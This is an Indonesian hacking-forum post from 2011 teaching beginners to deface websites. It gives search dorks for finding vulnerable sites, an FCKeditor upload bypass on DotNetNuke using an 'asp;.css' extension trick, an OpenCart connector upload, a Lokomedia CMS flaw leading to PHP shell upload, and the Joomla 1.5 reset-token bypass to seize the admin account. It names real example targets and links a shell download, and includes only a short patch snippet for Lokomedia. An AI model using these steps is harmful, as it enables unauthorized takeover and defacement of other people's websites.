DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya,,
klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx
di sini saya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target
http://www.pivocom.com/ sebagai contohnya..
sehingga akan menjadi seperti ini :
"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]
ntar keluar sendiri tuh, tombol browse ny kya gini..
gambar :
https://2img.net/h/i868.photobucket.com/albums/ab247/pajenkblog/tut1.jpgklo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini
http://www.mediafire.com/?zqvx2ajbyc4b17jtapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"
upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]
nah..abis itu kamu ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi
http://www.pivocom.com/portals/0/pajenk.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir
http://www.pivocom.com/*****deface dengan metode opencart*****
maaf ini khusu bwat newbi yg ingin blajar,,klo udah master mohon bimbingannya ..
seperti biasa nyarinya lewat paman google
dork nya :
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangun jadi gini aja Powered By OpenCart
langsung ke caranya,,
jika kamu sudah mendapatkan target nya
contoh target
http://www.digitalbazzar.co.uk/shop bisa juga
www.digitalbazzar.co.uk/cart,www.digitalbazzar.co.uk/patch dll
klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadinya kya gini
http://www.digitalbazzar.co.uk/shop/...tors/test.htmlklo ketemu yang kya gini
http://digitalbazzar.co.uk/shop/ kamu inject di blakang /shop/ nya..
maka akan muncul tampilan seperti ini..
gambar :http://3.bp.blogspot.com/-e1mjGDVYkPc/TWtPmKW5v_I/AAAAAAAAAT4/B_Da9EzriZ8/s1600/web1.jpg
jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya...
jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.digitalbazzar.co.uk/******Patch Bug CMS Lokomedia*****
DORK=allinurl:/media.php?module=berita
Kesalahan sang programmer berada di file /admin/content.php yang tidak menyertakan start session() untuk menyaring / membedakan antara user biasa dan administrator. sehingga dari URL browser saya lansung megetikkan url : "http://www.contohcms.com/admin/content.php?module=user" apa yang terjadi? Saya lalu di lempar ke halam yang berfungsi untuk menginputkan user baru (yang seharusnya user baru dikelola oleh admin web) Saya klik tombol Tambah User. Setelah menginputkan user baru dan menyimpan nya saya dilempar lagi ke halaman yang bertulisan "Untuk Mengakses Modul Anda Harus Login" Lalu saya login dengan mengetikkan username dan password yang baru saja saya inputkan tadi. Hasilnya.......!!!! Saya pun berhasil login (Meski Belum menjadi Administrator) berikutnya saya mengganti URL Pada browser menjadi "http://www.contohcms.com/admin/content.php?module=berita" Saya kemudian menginputkan sebuah berita dengan judul asal-asalan, kategori=terserah, isi berita= terserah, foto berita='kosong' simpan berita tersebut, kemudian lakukan edit berita yang beru saja saya inputkan. sekarang saya mau mengganti foto berita yang tadinya masih kosong, saya mau mengganti dengan Shell PHP (Bisa anda download di Kategori Download Pada Blog ini) Ternyata sang programmer tidak memproteksi jenis extension file yang akan di upload, Al hasil saya berhasil mengupload shell php ke server terletak di folder /admin/foto-berita/shell.php. saya mengeksekusi shell tersebut, dan........(Selanjutnya Terserah Anda:: Mau mendeface, memberitahukan ke admin website, atau mau melumpuhkan total website tersebut--Namun Bersikaplah selayaknya Hacker sesuai dengan Etika hacking ) tidak hanya menjadi administraotr di website tersebut saya pun menjadi Root di server tempat website tersebut di hosting.
PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file /admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
Menambahkan penggalan kode yang sama di file /admin/aksi.php
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}
menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan penggalan kode berikut:
if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){
echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}
sumber
buku Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim.
*****jomla patching********
sempet kepikiran ga akan bikin thread lagi karna udah di infract oleh om momod yang ganteng...
tapi bodo akh yang penting bisa share .. maap ya om kalo salah lagi
for : joomla 1.5.x
kett :
* untuk joomla 1.5.x tepatnya 1.5.0 -1.5.5 DIATAS 1.5.5 udah di patch
** administrator situs belum merubah default user administrator
***untuk joola 1.5.x yang belum di patch
1. cari situs yang memakai joomla, dork : inurl:option=com_user
2. misal target :
http://www.sayaganteng.go.id/index.p...er&view=login&....3. ganti url tersebut menjadi
http://www.sayaganteng.go.id/index.p...layout=confirm4.kita akan masuk ke sebuah halaman untuk mengakses token (disinilah keberuntungan kita jika admin tersebut lengah) masukan token '
5.jika berhasil maka akan keluar form untuk mereset password .. (ganti password tersebut sesuai kata hati kita) :Ngakak
6.click submit atau enter maka password default administrator akan di rubah.
7.masuk
www.sayaganteng.go.id/administrator setelah itu login sebagai admin ..
username: admin
password : sesuai kata hati kita :Ngakak
8. jika login berhasil .. masuk ke menu template manajer .. cari template yang bertanda bintang dan rubah index.php dengan kode html yang kita inginkan
sabar kunci utamanya
semoga berhasil
Thu Sep 01, 2011 6:07 am